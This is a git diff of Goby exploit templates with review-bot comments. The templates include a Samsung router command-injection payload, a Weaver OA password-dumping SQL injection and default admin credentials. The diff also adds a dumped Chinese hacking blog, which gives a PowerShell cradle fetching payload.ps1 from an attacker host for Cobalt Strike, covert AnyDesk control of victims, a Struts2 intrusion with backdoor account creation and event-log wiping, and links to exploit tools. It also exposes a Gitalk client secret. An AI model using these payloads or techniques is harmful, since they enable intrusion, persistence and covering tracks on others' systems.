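Review bot: The first hunk changes the `ScanSteps` request from `POST` to `GET` while keeping a form-encoded `data` body and adding a `Content-Type: application/json;charset=UTF-8` header, so the request now carries a body on a GET with a content type that does not describe it; the duplicate template in the next file (Samsung_WLAN_AP_wea453e_router_RCE.json) keeps `POST` for the same URI, and both cannot be right. The new `GobyQuery` `title=\"Samsung WLAN AP\" || app=\"Chunjs-server\" && body=\"Samsung Electronics\"` mixes `||` and `&&` without parentheses, so its meaning depends on the language's precedence; `(title=\"Samsung WLAN AP\") || (app=\"Chunjs-server\" && body=\"Samsung Electronics\")` states the intent explicitly. Keeping two files for the same product and endpoint with diverging methods and fingerprints means every fix has to be made twice.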
diff --git a/json/Samsung_WLAN_AP_wea453e_router_RCE.json b/json/Samsung_WLAN_AP_wea453e_router_RCE.json index fac7a7d..fcab6f2 100644 --- a/json/Samsung_WLAN_AP_wea453e_router_RCE.json +++ b/json/Samsung_WLAN_AP_wea453e_router_RCE.json @@ -1,82 +1,175 @@ { - "Name": "Samsung WLAN AP wea453e router RCE", - "Level": "3", - "Tags": [ - "RCE" - ], - "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", - "Description": "Samsung WLAN AP wea453e router has a remote command execution vulnerability. It can execute arbitrary commands without authorization to obtain server permissions", - "Product": "Samsung WLAN AP wea453e router", - "Homepage": "https://www.samsung.com/cn/", - "Author": "PeiQi", - "Impact": "

Execute any command to get the server permission

", - "Recommandation": "", - "References": [ - "http://wiki.peiqi.tech" - ], - "HasExp": true, - "ExpParams": [ - { - "name": "Cmd", - "type": "input", - "value": "cat /etc/passwd", - "show": "" - } - ], - "ScanSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/json;charset=UTF-8" - }, - "data_type": "text", - "data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt" - }, - "ResponseTest": { - "type": "group", - "operation": "AND", - "checks": [ - { - "type": "item", - "variable": "$code", - "operation": "==", - "value": "200", - "bz": "" - }, - { - "type": "item", - "variable": "$body", - "operation": "contains", - "value": "root", - "bz": "" - } - ] - }, - "SetVariable": [] - } - ], - "ExploitSteps": [ - "AND", - { - "Request": { - "method": "POST", - "uri": "/(download)/tmp/a.txt", - "follow_redirect": false, - "header": { - "Content-Type": "application/json;charset=UTF-8" - }, - "data_type": "text", - "data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt" - }, - "SetVariable": [ - "output|lastbody" - ] - } - ], - "PostTime": "2021-04-04 23:47:22", - "GobyVersion": "1.8.255" + +​ "Name": "Samsung WLAN AP wea453e router RCE", + +​ "Level": "3", + +​ "Tags": [ + +​ "rce", + +​ "getshell" + +​ ], + +​ "GobyQuery": "app=\"Chunjs-server\" && body=\"Samsung Electronics\"", + +​ "Description": "xxxx", + +​ "Product": "xxxxxx", + +​ "Homepage": "https://gobies.org/", + +​ "Author": "gobysec@gmail.com", + +​ "Impact": "

xxxx

", + +​ "Recommendation": "

xxxxx

", + +​ "References": [ + +​ "https://gobies.org/" + +​ ], + +​ "HasExp": true, + +​ "ExpParams": [{ + +​ "Name": "cmd", + +​ "Type": "input", + +​ "Value": "ls" + +​ }], + +​ "ExpTips": { + +​ "Type": "", + +​ "Content": "" + +​ }, + +​ "ScanSteps": [ + +​ "AND", + +​ { + +​ "Request": { + +​ "method": "POST", + +​ "uri": "/(download)/tmp/a.txt", + +​ "follow_redirect": true, + +​ "header": null, + +​ "data_type": "text", + +​ "data": "command1=shell:ifconfig| dd of=/tmp/a.txt", + +​ "set_variable": [] + +​ }, + +​ "ResponseTest": { + +​ "type": "group", + +​ "operation": "AND", + +​ "checks": [{ + +​ "type": "item", + +​ "variable": "$code", + +​ "operation": "==", + +​ "value": "200", + +​ "bz": "" + +​ }, + +​ { + +​ "type": "item", + +​ "variable": "$body", + +​ "operation": "contains", + +​ "value": "eth0", + +​ "bz": "" + +​ } + +​ ] + +​ }, + +​ "SetVariable": [ + +​ "output|lastbody|regex|" + +​ ] + +​ } + +​ ], + +​ "ExploitSteps": [ + +​ "AND", + +​ { + +​ "Request": { + +​ "method": "POST", + +​ "uri": "/(download)/tmp/a.txt", + +​ "follow_redirect": true, + +​ "header": null, + +​ "data_type": "text", + +​ "data": "command1=shell:{{{cmd}}} | dd of=/tmp/a.txt", + +​ "set_variable": [] + +​ }, + +​ "ResponseTest": { + +​ "type": "group", + +​ "operation": "AND", + +​ "checks": [] + +​ }, + +​ "SetVariable": [ + +​ "output|lastbody||" + +​ ] + +​ } + +​ ], + +​ "PostTime": "2021-11-26 19:12:54", + +​ "GobyVersion": "1.9.310" + } \ No newline at end of file diff --git a/json/Security_Devices_Hardcoded_Password.json b/json/Security_Devices_Hardcoded_Password.json index f50e512..49a522c 100644 --- a/json/Security_Devices_Hardcoded_Password.json +++ b/json/Security_Devices_Hardcoded_Password.json 
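Review bot: Every key on the new side of this hunk is preceded by an invisible character (it appears to be a zero-width space, U+200B, but that should be confirmed with a hex dump) and separated by blank lines; JSON permits only space, tab, CR and LF as whitespace outside strings, so a strict parser will reject the file, and the stray characters need to be stripped before merge. The rewrite also replaces the curated metadata with placeholders (`"Description": "xxxx"`, `"Product": "xxxxxx"`, `"Impact": "xxxx"`, `"Recommendation": "xxxxx"`, with Homepage and Author reset to the gobies.org defaults), so the entry no longer tells the reader what the vulnerability is. The new `ExploitSteps` has `"checks": []` and a `SetVariable` of `"output|lastbody||"`, so any response at all counts as a successful exploit; a `$code == 200` check and the `"output|lastbody|regex|"` form used elsewhere in this commit would be the consistent choice.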
@@ -5,11 +5,11 @@
 "infoleak"
 ],
 "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"",
- "Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。",
- "Product": "多个",
- "Homepage": "无",
- "Author": "aetkrad",
- "Impact": "",
+ "Description": "",
+ "Product": "",
+ "Homepage": "",
+ "Author": "",
+ "Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.",
 "Recommendation": "",
 "References": [
 "https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw"
@@ -94,6 +94,6 @@
 ]
 }
 ],
- "PostTime": "2021-12-06 16:14:12",
- "GobyVersion": "1.9.310"
+ "PostTime": "0000-00-00 00:00:00",
+ "GobyVersion": "0.0.0"
 }
\ No newline at end of file
diff --git a/json/SonarQube_unauth_CVE_2020_27986.json b/json/SonarQube_unauth_CVE_2020_27986.json
index 53cfdc9..e736b52 100644
--- a/json/SonarQube_unauth_CVE_2020_27986.json
+++ b/json/SonarQube_unauth_CVE_2020_27986.json
@@ -4,7 +4,7 @@
 "Tags": [
 "unauth"
 ],
- "GobyQuery": "app=\"SonarQube-code management\"",
+ "GobyQuery": "app=\"SonarQube\"",
 "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
 "Product": "SonarQube",
 "Homepage": "https://www.sonarqube.org/",
@@ -14,7 +14,7 @@
 "References": [
 "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
 ],
- "HasExp": true,
+ "HasExp": false,
 "ExpParams": null,
 "ExpTips": {
 "Type": "",
@@ -64,50 +64,6 @@
 ]
 }
 ],
- "ExploitSteps": [
- "AND",
- {
- "Request": {
- "method": "GET",
- "uri": "/api/settings/values",
- "follow_redirect": true,
- "header": null,
- "data_type": "text",
- "data": "",
- "set_variable": []
- },
- "ResponseTest": {
- "type": "group",
- "operation": "AND",
- "checks": [
- {
- "type": "item",
- "variable": "$code",
- "operation": "==",
- "value": "200",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "sonaranalyzer-cs.nuget.packageVersion",
- "bz": ""
- },
- {
- "type": "item",
- "variable": "$body",
- "operation": "contains",
- "value": "sonar.core.id",
- "bz": ""
- }
- ]
- },
- "SetVariable": [
- "output|lastbody|regex|"
- ]
- }
- ],
- "PostTime": "2022-06-25 20:10:24",
- "GobyVersion": "1.9.323"
+ "PostTime": "2021-11-29 15:03:58",
+ "GobyVersion": "1.9.310"
 }
\ No newline at end of file
diff --git a/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json b/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
index ac72523..6ae21fe 100644
--- a/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
+++ b/json/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
@@ -4,16 +4,23 @@ "Tags": [ "SSRF" ], - "GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"", - "Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.", + "GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"", + "Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.", "Product": "VMWare Operations vRealize Operations", - "Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html", - "Author": "PeiQi", - "Impact": "

 can perform server-side request forgery attack to steal management credentials.

", - "Recommandation": "

undefined

", + "Homepage": "https://www.vmware.com/products/vrealize-operations.html", + "Author": "", + "Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", + "Recommendation": "", "References": [ - "http://wiki.peiqi.tech" + "https://nvd.nist.gov/vuln/detail/CVE-2021-21975", + "https://www.vmware.com/security/advisories/VMSA-2021-0004.html" ], + "HasExp": true, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -64,7 +71,7 @@ "SetVariable": [] } ], - "ExploitSteps": [ + "ExploitSteps": [ "AND", { "Request": { @@ -111,11 +118,9 @@ } ] }, - "SetVariable": [ - "output|lastbody" - ] + "SetVariable": [] } ], - "PostTime": "2021-04-07 23:45:28", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json index 670e4b2..d106efe 100644 --- a/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json +++ b/json/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json @@ -8,7 +8,7 @@ "Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.", "Product": "VMware-vCenter", "Homepage": "https://www.vmware.com/products/vcenter-server.html", - "Author": "aetkrad", + "Author": "", "Impact": "", "Recommendation": "", "References": [ @@ -100,6 +100,6 @@ ] } ], - "PostTime": "2021-12-02 18:50:55", - "GobyVersion": "1.9.310" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file 
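Review bot: The third hunk replaces `"output|lastbody"` with an empty `"SetVariable": []` in `ExploitSteps` while the first hunk sets `HasExp: true`, so the exploit stage now issues its request but exposes nothing of the response; the other templates in this commit use `"output|lastbody|regex|"` in this slot. The new `Impact` sentence in the first hunk has a doubled verb (`may allow a malicious actor ... can perform`); `... may allow a malicious actor with network access to the vRealize Operations Manager API to perform a Server Side Request Forgery attack to steal administrative credentials.` reads correctly. The `title==` to `title=` change on the `GobyQuery` line follows the same pattern raised on the Konga entry.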
diff --git a/json/Weaver_OA_8_SQL_injection.json b/json/Weaver_OA_8_SQL_injection.json index b523bde..e59fe29 100644 --- a/json/Weaver_OA_8_SQL_injection.json +++ b/json/Weaver_OA_8_SQL_injection.json @@ -5,15 +5,19 @@ "SQL Injection" ], "GobyQuery": "app=\"Weaver-OA\"", - "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", + "Description": "", "Product": "Weaver OA 8", - "Homepage": "https://www.weaver.com.cn/", - "Author": "PeiQi", - "Impact": "", - "Recommandation": "

undefined

", - "References": [ - "http://wiki.peiqi.tech" - ], + "Homepage": "https://weaver.com/", + "Author": "", + "Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.", + "Recommendation": "", + "References": [], + "HasExp": false, + "ExpParams": null, + "ExpTips": { + "Type": "", + "Content": "" + }, "ScanSteps": [ "AND", { @@ -21,7 +25,7 @@ "method": "GET", "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", "follow_redirect": false, - "header": {}, + "header": null, "data_type": "text", "data": "" }, @@ -47,7 +51,7 @@ "type": "item", "variable": "$body", "operation": "not contains", - "value": "", + "value": "<html>", "bz": "" }, { @@ -62,6 +66,6 @@ "SetVariable": [] } ], - "PostTime": "2021-04-10 08:00:20", - "GobyVersion": "1.8.255" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/YAPI_RCE.json b/json/YAPI_RCE.json index b796f28..f72040a 100644 --- a/json/YAPI_RCE.json +++ b/json/YAPI_RCE.json 
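Review bot: The first hunk empties `Description`, moves the only vulnerability text into `Impact`, empties `References` where a wiki page was cited, and changes `Homepage` from `https://www.weaver.com.cn/` to `https://weaver.com/`; the product is named `Weaver OA 8` and `Pan micro OA V8` in the same file, so the new domain should be confirmed as this vendor's site before the `.cn` one is dropped. The `not contains` check in the third hunk now has a real value (`<html>`) instead of an empty string, which is the genuine fix in this file. A one-line `Description` such as `SQL injection via /js/hrm/getdata.jsp in Weaver OA 8` would keep the entry readable in listings without duplicating `Impact`.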
@@ -4,17 +4,20 @@ "Tags": [ "rce" ], - "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", - "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", + "GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"", + "Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.", "Product": "YAPI", "Homepage": "https://github.com/YMFE/yapi", - "Author": "aetkrad", - "Impact": "", + "Author": "", + "Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.", "Recommendation": "", "References": [ + "https://www.secpulse.com/archives/162502.html", + "https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b", + "https://twitter.com/sec715/status/1415484190561161216", "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" ], - "HasExp": false, + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -64,6 +67,43 @@ ] } ], - "PostTime": "2021-12-01 20:34:40", - "GobyVersion": "1.9.310" + "ExploitSteps": [ + "AND", + { + "Request": { + "method": "GET", + "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/alibaba_canal_default_password.json b/json/alibaba_canal_default_password.json index bd3b0b6..ee40781 100644 
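Review bot: The new `Impact` line in the first hunk states that `remote unauthenticated attackers` can execute arbitrary code, but the removed Chinese `Description` said the instance has to be exposed with open registration and the attacker executes commands only after registering (`注册后执行任意命令`); the precondition was lost in translation and the English sentence now overstates the exposure. Something like `An attacker who can register an account on a YApi instance exposed with open registration can execute arbitrary code.` preserves it, and the still-empty `Recommendation` field is the natural place to say that registration should be closed on Internet-facing instances. The `ExploitSteps` added in the second hunk is the `/test.php` placeholder already raised on the RuoYi hunk.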
--- a/json/alibaba_canal_default_password.json +++ b/json/alibaba_canal_default_password.json @@ -1,18 +1,20 @@ { - "Name": "alibaba canal default password", - "Level": "3", + "Name": "Alibaba Canal Default Password", + "Level": "2", "Tags": [ "defaultaccount" ], - "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", - "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", - "Product": "Remote attacker can use this default to control the system", + "GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"", + "Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.", + "Product": "Alibaba Canal", "Homepage": "https://github.com/alibaba/canal", - "Author": "aetkrad", - "Impact": "", - "Recommendation": "", - "References": [], - "HasExp": false, + "Author": "", + "Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.", + "Recommendation": "Modify Alibaba Canal administrator's default password.", + "References": [ + "https://github.com/alibaba/canal/wiki/ClientAdapter" + ], + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -128,6 +130,6 @@ ] } ], - "PostTime": "2021-10-31 17:23:05", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/content.json b/json/content.json new file mode 100644 index 0000000..19b3490 --- /dev/null +++ b/json/content.json 
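Review bot: The single `References` entry added in the first hunk points at the `ClientAdapter` wiki page, which by its title documents the client adapter rather than the Canal Admin login whose default credential `admin:123456` the `Impact` line describes; a reference that documents the admin console and its initial credential would support the entry better. `Level` is also lowered from `"3"` to `"2"` in the same hunk while `HasExp` flips to `true` for a default administrator password; the page does not show the level scale, so the downgrade should be confirmed as intentional. The added `Recommendation` is a welcome change; the `Description` sentence has a stray capital (`is Incremental log parsing`).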
@@ -0,0 +1 @@ +{"meta":{"title":"魔域魂窟","subtitle":"","description":"网络安全","author":"魂笛","url":"http://bo.vuvhz.top","root":"/"},"pages":[],"posts":[{"title":"工具整理","slug":"工具整理","date":"2022-11-30T02:34:26.000Z","updated":"2022-11-30T02:38:31.322Z","comments":true,"path":"2022/11/30/工具整理/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/%E5%B7%A5%E5%85%B7%E6%95%B4%E7%90%86/","excerpt":"","text":"#thinkphp漏洞检测工具 写文件测试默认写入根目录名为shell.php内容为的php文件,只是证明有漏洞并没有写入shell。 工具只用来验证漏洞,没有自定义命令/代码执行。 本工具只用来授权检测,未经授权的测试严禁使用本工具。 链接:https://pan.baidu.com/s/1VcfsJHAQCIJLevExNx86mA?pwd=dhc1提取码:dhc1 #Log4j2利用工具。#https://github.com/JaneMandy/Log4j2-Exp核心使用:JNDI-Injection-Exploit开发。 使用#修改Exp.py里面的参数,如Path,设置为JDK8的java的绝对路径。(如果默认java是jdk8不用设置)修改Host,如果是DOCKER,设置为能够回连到Exp为止。建议使用VPS。请确保所有端口被攻击机可以连接。确保利用成功请运行expo和靶场环境均为JDK8。如果JDK版本高于1.8.191等,请被攻击方URLCodebase参数为ture。否则攻击失败。 更新#取消掉了原有的Payload. 大家命令执行时避免命令冲突就行了,主要是直接命令行方式传入参数。如果想设置cs等等上线,建议使用长度较短的payload。 我也给大家提供了攻击环境。#Log4j2RCE为本地测试环境demo.jar为vulfocus靶场的环境,注意都需要使用jdk8运行。 #V2.1_Fofa收集工具 gayhub:https://github.com/naozibuhao/fofatools/releases/tag/V2.1 大威天龙v1.3升级到大罗法咒V2.0 变更说明: 1.更名为大罗法咒V2.0 2.项目化查询,对于同一个查询内容放在同一个tab页 3.添加自定义接口 4.鼠标右击表格内容,增加添加此查询条件 5.取消彩蛋(取消打开gayhub,播放大威天龙背景音乐) 6.还是没有导出功能,要导出的话,表格里面全选复制,然后到excel中粘贴即可 后续会在易用性上继续进行升级 #shiro工具 #自动化钓鱼文档生成工具,自带免杀效果 自动化钓鱼文档生成工具,自带免杀效果 地址:https://github.com/lengjibo/OffenSiveCSharp/tree/master/xlsmfishing 目前仅支持xlsm格式,VT上大约爆十个左右。 演示视频:https://www.bilibili.com/video/BV15v41187jw 求star、fork#Apache Solr 漏洞检测利用工具v1.1 https://www.secquan.org/Tools/1071842 Apache Solr 漏洞检测利用工具 更新了一下 主要更新: 1、增加了任意文件读取漏洞 2、修改已知bug 本工具仅供学习交流测试,请勿用于任何非法活动,本人不承担一切相关法律责任 #漏洞利用虚拟机 这东西整起来坑太多,直接发大家一份正好的虚拟机版本 我叫雷锋,虚拟机密码ubuntu 链接:https://pan.baidu.com/s/1KuGB6oOwFTZRwZEVGIZ8GA?pwd=4gtn提取码:4gtn #通达OA综合利用工具 关漏洞POC进行整合, 写成图形化工具. 本工具仅供安全测试人员运用于授权测试, 禁止用于未授权测试, 违者责任自负!!! 
项目地址#https://github.com/xinyu2428/TDOA_RCE/releases #CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具 下载地址:#https://github.com/admin360bug/GUI-POC-EXP/# var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Weblogic图形化利用工具","slug":"Weblogic图形化利用工具","date":"2022-11-30T02:14:02.000Z","updated":"2022-11-30T02:14:55.146Z","comments":true,"path":"2022/11/30/Weblogic图形化利用工具/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/Weblogic%E5%9B%BE%E5%BD%A2%E5%8C%96%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7/","excerpt":"","text":"#Weblogic图形化利用工具Weblogic图形化利用工具#前几天碰到一个weblogic的站发现有的工具只能执行命令不能写webshell,找到个工具集成了各个利用方法,也可以直接写内存马https://github.com/sp4zcmd/WeblogicExploit-GUI var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"anydesk进行远控","slug":"anydesk进行远控","date":"2022-11-29T04:35:03.000Z","updated":"2022-11-29T04:38:01.521Z","comments":true,"path":"2022/11/29/anydesk进行远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/anydesk%E8%BF%9B%E8%A1%8C%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#anydesk进行远控在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。 本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。 首先上线cs#这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本 然后在目标机器上执行:(使用管理员权限执行) 1powershell "$a='IEX(New-Object 
Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)" 可以看到上线成功 下载anydesk#获取到权限以后 ,我们在目标机器上下载anydesk: 1powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\\anydesk.exe") 我们看到anydesk已经下载到了目标主机上,这是我们先不急着打开,我们先添加他的配置文件 #生成配置文件#如果我们直接打开的话,我们不知道他的id号,也不能通过密码进行登录,更不可能直接修改,这时候我们可以先在本机生成一个配置文件,然后将配置文件拷过去。 所以我们先下载一个anydesk到本地,然后打开它,记住他的id号,例如我的就是802691146我们为自主访问设置密码在这里随便设置一个密码 然后我们将anydesk彻底关闭,退出的时候选择不安装anydesk他会自动将配置文件生成在%appdata%\\AnyDesk,也就是C:\\Users\\你的用户名\\AppData\\Roaming\\AnyDesk 我们将这四个文件保存下来,然后上传到目标主机的对应位置,务必记得保存到别处以后把本机的配置文件删除#上传配置文件并启动anydesk#在这个路径下新建一个名为AnyDesk的文件夹 然后在此文件夹下上传刚刚保存的四个配置文件 然后启动anydesk 连接测试,提示输入密码 成功连接 #注意事项#这里说一下避免踩坑的几个点: 记的在这里一定要把用户名称改成自定义,否则在那边直接会显示你的用户名 \\手动狗头 生成配置文件后将配置文件保存后记的删除配置文件,下次你重新启动anydesk的时候会自动生成并自动重新分配一个id目标主机必须有管理员权限必要时可以可以设置代理,避免让对方反制自己(由于我是用的是clash,直接代理的本地7890端口)控制目标机器后可以关闭目标机器的anydesk,但实际不会断开连接,且连接结束后会自动结束目标机器的anydesk进程,便于消除痕迹控制目标机器后记的开启禁止用户输入和启动隐私模式 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Struts2漏洞","slug":"Struts2漏洞","date":"2022-11-29T04:23:53.000Z","updated":"2022-11-29T04:29:15.245Z","comments":true,"path":"2022/11/29/Struts2漏洞/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/Struts2%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#Struts2漏洞实战锁定目标后发现没有注入,也没有xss,也没有远程代码执行于是用检测工具,盲打,打出了Struts2,于是开始漏洞利用1.github上面有Struts2工具,拿到shell,上线冰蝎 2.然后一番周折,我的马直接被它安全管家杀掉,于是又加强了我的马,成功的绕过了安全管家,成功上线 3.查看系统信息 4.运气比较好,直接getsystem 然后建立账号net user hack$ hack /add && net localgroup hack hack$ /add 5.常规操作,想办法获取密码,不知到这是什么情况,于是我懵了,刚刚和安全管家大战2天,今天又碰到了系统问题 密码好像是加密的,哎。我还是太菜了6.然后赶紧删除记录 
系统日志:%SystemRoot%\\System32\\Winevt\\Logs\\System.evtx安全日志:%SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx应用程序日志:%SystemRoot%\\System32\\Winevt\\Logs\\Application.evtx日志在注册表的键:HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Eventlog 开始→运行,输入 eventvwr 进入事件查看器,右边栏选择清除日志。 PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}” Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} eventcreate -l system -so administrator -t warning -d “this is a test” -id 500 meterpreter > run event_manager -i meterpreter > run event_manager -c meterpreter > clearev 一顿操作猛如虎,一看技术两条狗 7.3389死活打不开,不知是不是安全管家搞的,于是用通道建立隧道,msf打一下内网 打完ms17-010,无果8.第二天在弄,马连接效果还是好,关机了,还能不断 获取到了hash,但是忘记截图了 aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0我尝试用hash登录,也失败了。。国庆节了,我还是没有破解开,太菜了,呜呜,大佬们可以帮我破解一下吗?小弟十分感谢啊 然后获取截图,使用社区大佬发的远程协助工具漏洞通过修改软件运行后的文档内容,二改成固定的协助码的方式,顺利登录服务器 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"wifi杀手终极版oled显示","slug":"wifi杀手终极版oled显示","date":"2022-11-29T03:53:21.000Z","updated":"2022-11-29T03:54:01.209Z","comments":true,"path":"2022/11/29/wifi杀手终极版oled显示/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/wifi%E6%9D%80%E6%89%8B%E7%BB%88%E6%9E%81%E7%89%88oled%E6%98%BE%E7%A4%BA/","excerpt":"","text":"#wifi杀手终极版oled显示https://github.com/SpacehuhnTech/esp8266_deauther/releases/tag/2.6.1#感谢spacehuhn开源#某宝240,成本26#测试效果秒杀,但是只支持2.4G频段的#制作方法:一个esp8266,一个oled屏幕,按键oled可以买IIC接口的也可以买SPI接口,SPI接口速度更快因为便宜,所以我选择IIC的 1.固件 https://github.com/SpacehuhnTech/esp8266_deauther/releases/download/2.6.1/esp8266_deauther_2.6.1_DSTIKE_DEAUTHER_OLED_V1_5.bin 2.攻击方式分为: 
